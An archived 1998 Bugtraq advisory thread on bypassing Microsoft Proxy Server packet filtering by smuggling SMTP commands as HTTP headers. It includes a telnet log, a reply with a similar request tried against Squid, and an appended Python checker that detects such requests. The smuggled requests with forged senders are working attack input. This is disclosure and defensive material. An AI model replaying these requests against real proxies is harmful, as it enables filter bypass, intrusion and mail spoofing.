FW: WARNING: By-passing MS Proxy packet filtering

From: Jordan Mendelson <jordy@dont-contact.us>
Date: Fri, 9 Oct 1998 18:53:54 -0400

As far as I can tell, Squid is not vulnerable to this style of exploit (to a
point). I was unable to pass a ^J through an HTTP header to get something on
its own line (required for SMTP "." and anything else which will not allow
:'s).

Can anyone confirm this? Standard attack would look like this:

# telnet squid 3128
GET http://mail.yourhost.com:25/ HTTP/1.0
helo yahoo.com :
mail from: someone@yahoo.com
rcpt to: someone@yourhost.com
data :
:^J.^J

There is a similar gopher attack, however gopher is probably disabled on
everyone's Squid proxy :)

Jordan

--
Jordan Mendelson     : http://jordy.wserv.com
Web Services, Inc.   : http://www.wserv.com

-----Original Message-----
From: Bugtraq List [mailto:BUGTRAQ@netspace.org] On Behalf Of Mnemonix
Sent: Wednesday, October 07, 1998 2:11 AM
To: BUGTRAQ@netspace.org
Subject: WARNING: By-passing MS Proxy packet filtering

Whilst playing around with Microsoft's Proxy Server 2, I came across an
interesting "feature" that could allow someone to by-pass packet filtering
if enabled.

The essence of the "exploit" is to connect to a remote host on a given port
- in the example provided I have used the SMTP port (25) - through the Web
Proxy Service.

What you attempt to do is disguise service-specific commands as HTTP
headers. Below is a log of a telnet session where I've telnetted to the Web
Proxy Service, made a GET request and passed off the SMTP commands as HTTP
headers:
------------------------------------------8<------------------------------------------
GET http://smtpmail.globalnet.co.uk:25/ HTTP/1.0
mail from: me@here.com
rcpt to: mnemonix@globalnet.co.uk
data :
Subject: This is the Subject Line
:
 This is the body of the message. To get here do a Ctrl+J. To place a
single dot on a line do another Ctrl+J
                                                          .
220 sand2.global.net.uk ESMTP Exim 1.92 #1 Wed, 7 Oct 1998 06:51:37 +0100
500 Command unrecognized
500 Command unrecognized
500 Command unrecognized
250 <me@here.com> is syntactically correct
250 <mnemonix@globalnet.co.uk> is syntactically correct
354 Enter message, ending with "." on a line by itself
250 OK id=0zQmVd-0007md-00
500 Command unrecognized
500 Command unrecognized
------------------------------------------8<------------------------------------------

If the packet filter only allows incoming HTTP requests and the Web-Proxy
Service gives Everybody access, this could be used to gain entry to the
"protected" network.

This was tested on NT Server 4.0, Service Pack 3 with important hotfixes,
IIS 3.0 and MS Proxy 2.0.

l8r
Mnemonix
http://www.diligence.co.uk/
http://www.infowar.co.uk/mnemonix
Received on Fri Oct 09 1998 - 15:56:32 MDT
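The thread's point is that a forwarding proxy will relay a GET to port 25 and treat SMTP verbs as header lines, and that a bare LF (Ctrl+J) is what gets "." onto a line of its own. As an added example, not code from either poster, this Python check inspects a raw proxy request for the three things a proxy operator would refuse: a bare LF, a destination port outside an allowed set, and header lines that are not well-formed fields. The SAFE_PORTS set and both sample requests are constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Ports the proxy may reach on a plain GET. An assumption for this example
# (Squid's default squid.conf ships a comparable "Safe_ports" ACL); no 25.
SAFE_PORTS = {80, 443, 8080}

# RFC 7230 field-name token followed immediately by a colon.
FIELD_RE = re.compile(r"^[!#$%&'*+.^_`|~0-9A-Za-z-]+:")

# Constructed from the telnet session in the post: CRLF-terminated lines,
# with bare LFs (Ctrl+J) used to get ":" and "." onto lines of their own.
SMUGGLED_REQUEST = (
    b"GET http://mail.yourhost.com:25/ HTTP/1.0\r\n"
    b"helo yahoo.com :\r\n"
    b"mail from: someone@yahoo.com\r\n"
    b"rcpt to: someone@yourhost.com\r\n"
    b"data :\r\n"
    b":\n.\n"
    b"\r\n"
)

# An ordinary browser-style request for comparison (constructed).
CLEAN_REQUEST = (
    b"GET http://www.example.com/ HTTP/1.0\r\n"
    b"Host: www.example.com\r\n"
    b"\r\n"
)


def inspect_proxy_request(raw: bytes) -> list[str]:
    # Returns policy findings for one raw proxy request; empty list = clean.
    findings = []
    # LF without CR is the Ctrl+J trick that puts SMTP verbs on their own lines.
    if re.search(rb"(?<!\r)\n", raw):
        findings.append("bare LF in request")
    lines = [ln.rstrip("\r") for ln in raw.decode("latin-1").split("\n")]
    parts = lines[0].split(" ")
    if len(parts) != 3:
        return findings + ["malformed request line"]
    url = urlsplit(parts[1])
    if url.scheme != "http" or not url.hostname:
        findings.append(f"unsupported target {parts[1]!r}")
    elif (url.port or 80) not in SAFE_PORTS:
        findings.append(f"destination port {url.port} not in Safe_ports")
    for ln in lines[1:]:
        if ln == "":
            break  # blank line ends the header block
        if not FIELD_RE.match(ln):
            findings.append(f"non-header line in header block: {ln!r}")
    return findings
```

Run against SMUGGLED_REQUEST the function reports the bare LF, port 25 and every SMTP verb as a non-header line; CLEAN_REQUEST produces no findings.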
